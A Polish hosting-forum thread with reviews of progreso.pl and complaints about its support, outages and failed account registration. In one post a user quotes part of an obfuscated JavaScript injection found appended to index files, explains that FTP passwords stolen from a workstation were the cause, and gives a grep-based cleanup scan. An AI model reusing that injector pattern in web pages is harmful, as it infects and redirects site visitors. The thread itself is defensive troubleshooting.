Skocz do zawartości
Gość Bartosz Gadzimski

Opinie progreso.pl

Polecane posty

Proszę tylko wytłumaczyć czemu u innych providerów nie występują tego typu usterki ?

Na dokładnie tych samych wersjach joomla !

Inne dodatki zainstalowane, ktoś wyjątkowo lubi Twoją stronę atakować, inne prawa plików, faktyczna inny konfiguracja serwera (ale to i tak włam ma miejsce przez joomle a nie przez serwer i winna jest temu joomla)

 

Ponadto jak wspomniałem włamania dokonywane są także na strony html a nie tylko na strony cms-a.

Czy tym tokiem mam nie używać html ?

To normalne bo jeżeli te same prawa użytkownika odnoszą się do serwisu joomla jak i do innych katalogów to skrypt uruchomiony z prawami takimi jak joomla może sobie pobuszowaćć i pozmieniać pliki na innych serwisach.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
Proszę o radę co z tym zrobić ?

 

Zmień jak najszybciej hosting na inną firmę.

 

Obojętne jaką. Byle nie progreso.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
Gość adamszendzielorz
OK.

Proszę tylko wytłumaczyć czemu u innych providerów nie występują tego typu usterki ?

Na dokładnie tych samych wersjach joomla !

 

Juz otrzymales na ten temat odpowiedz -> u nas masz register_globals ustawione na "On", co drastycznie zmniejsza bezpieczenstwo tego skryptu. Kwestia jednego wpisu w pliku php.ini. "Wlamy" nie maja nic wspolnego z bezpieczenstwem serwera - chodzi o dziurawa wersje Twojej Joomli. Niestety decydujac sie na uzywanie oprogramowania typu Open Source, trzeba przynajmniej raz na kilka dni sledzic aktualizacje, a najlepiej jezeli dany soft posiada - zapisac sie na grupe mailowa z informacjami o aktualizacjach.

 

Otwierajac zlodziejowi drzwi do domu na osciez, bedziesz winil producenta drzwi, jak Cie okradna ? ;)

pozdr.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
Od kilku dni na serwerze progreso dokonywane są włamania i podmienianie stron index.php lub index.html tzn dopisywanie skryptu przekierowującego na stronę dvcd.info.

Zgłaszałem to do tzw. supportu i dowiedziałem się że to luki w cms joomla ( to rozumiem ) ale takie same włamania

dokonywane są na plikach html będących w innych katalogach powyżej joomla.

Ponadto na innych serwerach na których mam serwisy na joomla ( te same wersje ) włamania nie są dokonywane

( home.pl , nazwa.pl ) czyli chyba wina leży po stronie usługodawcy - tzn. jego zabezpieczeń lub raczej braku takowych.

Niech zgadnę: pojawia się mniej więcej taki wpis:
<script language="JavaScript">function rkfg(jflq){return

String.fromCharCode(jflq);}var

ohhe="060105102114097109101032115114099061039104116116

(few lines snipped)

2105803210410510010010111005903906206004710510211

4097109101062";var ifdm="";for(qhxk=0;qhxk<ohhe.length;qhxk+=3)

{ifdm+=rkfg(ohhe.substr (qhxk, 3));}window.status='Done';

document.write(ifdm);</script>

Usunąłem tego wirusa niedawno u mojego klienta i zdiagnozowałem źródło jako wyciek haseł FTP. Wirus na maszynie webmastera przechwycił hasła do FTP i wysłał je na zewnętrzny serwer. Po jakimś czasie nastąpiło połączenie FTP spoza Europy w czasie którego:

 

  • nastąpiło skanowanie konta w poszukiwaniu plików *.php *.html
  • dla każdego znalezionego pliku: DOWNLOAD / UPLOAD widoczna w transfer.log serwera FTP

Sposób usunięcia wirusa:

 

  1. Wywalić wirusy ze stacji roboczych
  2. Zmiana haseł FTP dla wszystkich kont
  3. Przeskanowanie konta w poszukiwaniu zainfekowanych plików

W moim przypadku skanowanie wygląd tak (skrypt CGI na serwerze):

 

#!/bin/sh

echo Content-type: text/plain

echo

(

find . -name \*.html -o -name \*.php | xargs grep ""

) 2>&1

am123, proponuję zajrzeć do logów serwera FTP - jeśli znajdziesz tam podejrzane sekwencje DOWNLOAD/UPLOAD łatanie Joomli i zwalanie na progreso niewiele pomoże. Daj znać o wynikach śledztwa (sam jestem ciekawy jaki mechanizm włamu zadziałał u ciebie).

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Dziękuję...

 

Wreszcie coś konstruktywnego.

 

Wykonałem część założeń z postu - czekam na efekty.

 

W takim bądź razie wyciek haseł FTP jest po czyjej stronie ? Providera czy dziurawego skryptu cms ?

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
W takim bądź razie wyciek haseł FTP jest po czyjej stronie ? Providera czy dziurawego skryptu cms ?

A przeczytałeś ze zrozumieniem to co Ci Dariusz Cieślak napisał ?

 

Wyciek haseł jest po stronie komputerów klienckich !! Co nie ma nic wspólnego z Provaiderem i z cms-em.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Na początek errata:

find . -name \*.html -o -name \*.php | xargs grep ""
Tu edytor wyciął mi fragment, powinno być: find . -name \*.html -o -name \*.php | xargs grep "<!-- ad -->"
W takim bądź razie wyciek haseł FTP jest po czyjej stronie ? Providera czy dziurawego skryptu cms ?
Nie wiem jak jest u ciebie. Na serwerze nie miałem Joomli (tym bardziej niezałatanej) - u mnie podejrzewam wyciek z wirusa na stacji roboczej (keylogger lub wyłuskanie zapisaneych haseł do FTP). Tym bardziej, że wirus skopiował się także na inne serwery do których był dostęp z tego komputera.

 

Czy są jakieś wyniki z analizy logów FTP?

 

Więcej szczegółów na temat wirusa: tutaj.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Efekty:

 

Okazało się ( zgodnie z w.w. sugestiami ) że wirus był w komputerze stacjonarnym ( moim ), wykradał hasła

do ftp, łączył się i na index-y php i html doklejał złośliwy kod.

 

Czyli wina nie leżała po stronie usługodawcy, jednak sposób w jaki się o tym dowiedziałem czyli tydzień walki

bez odpowiedzi lub chyba z jedną żebym był dokładny - że to wina dziurawych skryptów - przekonał mnie

że SUPPORT to najważniejsza rzecz po jakości usług - czasem nawet odwrotnie.

 

Tutaj w skali ocen 1-10 support mogę ocenić na 2-3. W sumie odpowiedzieli ale nie wniosło to kompletnie nic

w mój problem jako klienta - choć wina leżała jak się okazało po mojej stronie a dokładnie stronie na którą wszedłem

z zainfekowanym hackiem.

 

Tego hacka wykrywa tylko google chrom i blokuje stronę, inne przeglądarki czytają takie strony i psuja się bez problemów.

 

Gdyby ktoś miał podobne symptomy radzę: usunąć zapisane hasła w programach ftp, zmienić hasła, przeinstalować system i używać haseł z palca ;-)

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

moze troche zrobie OF ale musze jak czytam ostatni post Pana @am123. Radze zainstalowac program antywirusowy, firewall. SUPPORT firmy Progreso nie ochroni Pana @am123 przed zlapaniem wirusa. Radze wszystkim, przed napisanie postu (negatywnego) na temat usulg jakiekolwiek firmy, zastanowic sie. Nie sluchaj w 100% odpowiedz uzytkownikow z forum joomla, wordpress pt. "To wina hostingu"...zastanowic sie. Podziwiam @adamszendzielorz za nerwy na wodzy.

 

Pozdrawiam

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
Gość RuFiK

Witam,

Ja tez mialem problem z wirusem ktory podmienial mi indexa

 

Lekarstwo

- zmiana hasla na glowne konto FTP

- zakupienie kasp IS 2009 i pelny skan systemu i mojego intranetu (w moim przypadku) :)

 

pzdr

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
Gość adamszendzielorz
Podziwiam @adamszendzielorz za nerwy na wodzy.

 

Obslugujac helpdesk przez te kilka lat przyzwyczailem sie, ze niektorzy wieszaja na nim psy tylko dlatego, ze jest akurat pod reka, a ktos ma zly dzien :-) Nerwy trzymam na boku - to robota jak kazda inna. Jest problem - trzeba go rozwiazac i to wszystko :)

 

Bzikofski: pusc zgloszenie w helpdesku, jestes na slabo obciazonej maszynie (obecnie juz nie mamy innych ;-) i wszystko powinno chulac szybko.

pozdr.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Czytając pozytywne opinie w tym wątku i przeglądając jednocześnie opinie na tematy innych providerów zdecydowałem się na hosting w progreso. Chciałem jednakże spytać czy obciążenie kilkoma wp i eksperyentalną joomlą czy dwoma nie będzie problemem dla takiego konta (odwiedziny <200 uu dziennie). Druge pytanie o wersję MySQL 5.2.3 kiedy się pojawi.

 

Niestety już na starcie zniechęcenie :) infolinia - 2 minut oczekiwanua (poddałem się), na odpowiedź mailową czekam już prawie 24h :)

 

Z superhosta uciekam tylko ze względu na rzekome "przeciążenie serwera" (czym????), ale kurcze helpdesk przynajmniej odpowiada na maile w ciągu godziny :)

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
Gość

2-3 lata temu napisałbym "bierz".. dzisiaj napiszę: czy naprawdę chcesz przejść "z deszczu pod rynnę"?...

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
2-3 lata temu napisałbym "bierz".. dzisiaj napiszę: czy naprawdę chcesz przejść "z deszczu pod rynnę"?...

 

Ech no to już nie wiem. Coś co kosztuje <400 pln miesięcznie, nie dławi go kilka wordpressów i joomli, ma dobry panel (instalatory, dodawanie domen, itp), ma dobry helpdesk i nie pada co chwilę, ma dobrą prędkość... A może ja marzę?

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
Gość

Jeśli Ci się chce, to machnij mi mejla milosz@epoczta.pl lub GG 901 974 - podpytam to i owo i podzielę się najnowszymi newsami gdzie warto się zahościć : )

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Dzięki, ale chyba się zdecydowałem. Nie będe mówił gdzie bo mi serwer zapchacie :(

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

kolega error_404 najlepiej opisał aktualną sytuację w progreso

kiedyś było nieźle, żeby nie powiedzieć bardzo dobrze albo nawet super

ale to było kiedyś

aktualnie hosting w progreso zszedł na psy

ja osobiście za najgorszą rzecz uważam zamulone serwery i całkowity brak supportu

mam konto w progreso trzeci rok, ale już więcej nie przedłuże, zastanawiam się nawet czy teraz nie zerwać umowy

beobsługowy hosting można mieć za darmo

za pieniądze można już czegoś wymagać - dysproporcja pomiędzy ceną a jakością obsługi w progreso jest aktualnie ogromna

można powiedzieć że jest cena a nie ma obsługi

ostatnio miałem mały problem, dzwoniłem chyba 4 razy, zapewniano mnie że owszem zaraz naprawią, ale mam zgłosić to przez helpdesk - zgłosiłem, ticket wisi już tydzień i nic, wielkie nic - czyli klasyka, jak już niejedna osoba pisała

szczerze odradzam zakup hostingu w tej firmie, można tylko naprężyć sobie nerwy i nic więcej

wg mnie wielkie nieporozumienie

Pan Szendzielorz pisze, że firmę prowadzi już 10 lat i "coś tam" już wie

drogi Panie "coś tam" to o wiele za mało by mówić o profesjonalizmie

poleciłem firmę wielu znajomym, teraz zarządzam odwrót...

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
Gość adamszendzielorz
czyżby jakis padzik?

bo sie nie moge zaeftepować ani na strone wejsc..

 

edit: o juz funga

 

Padl nam glowny serwer DNS + extranetu + bazodanowy, z ktorego korzystaja praktycznie wszystkie maszyny "wewnetrznie", po LANie -> szkoda, bo szlismy z nim na rekord uptime'u, ktory wynosil juz blisko 500 dni :-) Przez to nie dzialal do konca wlasnie webmail, FTP, extranet no i nasza strona glowna. Problem zostal szybko rozwiazany.

pozdr.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Co się dzieje z rejestracją na Progreso?!?!

Od trzech dni chcę zarejestrować serser Biznes Plus i za każdym razem na samym końcu ostatniej strony rejestracji dostaje komunikat.:

"Błąd komunikacji..." i coś tam.

Zgłosiłem do helpdeska dokładny opis problemu i nic, dzwonie i dzwonie i tez nikt nie odbiera. Klient się niecierpliwi....

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Panowie nie o to chodzi. W normalnym przypadku zapewne bym tak zrobił ale mam nietypową sytuację. Sam już jestem klientem Progreso i patrząc na niektóre wpisy (o dziwo) nie mogę na nich narzekać. Naprawdę. Sytuacja jest taka, że mam klienta i postawiłem mu pewien serwis, który np. na home.pl się sypał (z całym szacunkiem dla home.pl). Zainstalowałem wszystko u siebie na koncie (czyli na Progreso), pomodyfikowałem itd. i wiem, że chodzi bez bólu. Ale nie chcę klienta serwisu trzymać u siebie. Więc klient chciał sobie założyć serwer na Progreso no i kaszanka... nawet mi trochę głupio przed klientem bo wcześniej nie miałem problemów z supportem

Może przeczyta to ktoś z Progreso.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
Gość

A ja bym brał od nich manatki.. "za karę".. za duża konkurencja jest na rynku, żeby takie jaja robić.. żeby konta nie można było zamówić?

phhhhhhhhhhh....

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
Gość
Temat jest zablokowany i nie można w nim pisać.

×